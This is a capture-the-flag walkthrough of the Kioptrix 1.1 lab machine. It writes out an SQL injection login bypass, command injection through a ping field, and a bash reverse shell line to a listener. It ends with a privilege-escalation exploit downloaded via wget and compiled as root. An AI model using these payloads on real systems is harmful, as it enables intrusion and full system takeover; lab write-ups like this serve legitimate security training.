Kioptrix-1.1 Walkthrough Vulnhub Machine
Hello everyone , Welcome back to a another walthrough on Kioptrix 1.1, Vulnhub machine series. It’s the continuation part of previous Kioptrix-1 walkthrough. check the link below for part 1.
Enough of Intro, So Let’s Begin,
Step 1: Download & Install the kioptrix 1.1 machine, Link below.
Kioptrix: Level 1.1 (2) ~ VulnHub
Step 2 : Finding the IP Address
sudo netdiscover -r 192.168.1.0/2
Step 2 : Put the IP in your browser & check any web server is running
We have a login page, Let’s try to bypass authentication using SQLi payloads. ( I used burpsuite to automate bruteforcing ) and used a random SQLi payload list from google.
admin’#
After entering admin’# in the input field, I was able to login to the website, enter your local machine IP address to ping the network.(your IP can be different)
Here we got the following output.
Let’s try Command Injection
<your IP>;ls
wohoo ! we are able to run arbitrary commands in the input box
So, Let’s setup a netcat listener and input a bash payload in input field
nc -nvlp 4444
From here you can copy the payload, Reverse Shell Cheat Sheet | pentestmonkey
;bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
After clicking on submit button, we are able to establish a connection & we got a Shell. (refer below images)
Here we can see there is a outdated Linux version running and we are not root user, Let’s try to escalate our privileges to root.
By doing simple Googling I found an exploit from exploitdb written in C language.
I have download the exploit to my local machine then setup a simple HTTP server.
service apache2 start
python -m http.server
We need to copy the exploit to the bash shell, so head back to the bash shell and copy the exploit using below command.
wget http://192.168.1.3/9542.c
I have copied the exploit to the /tmp folder now let’s compile and run it.
gcc 9542.c -o exploit && ./exploit
That’s it..!! We have successfully escalated our privileges and rooted the machine.
Hope you found this walkthrough easy and interesting, see you in the next article.
Do follow me on twitter https://twitter.com/chinmay_talad. for more Cybersecuring resouces and walkthroughs.
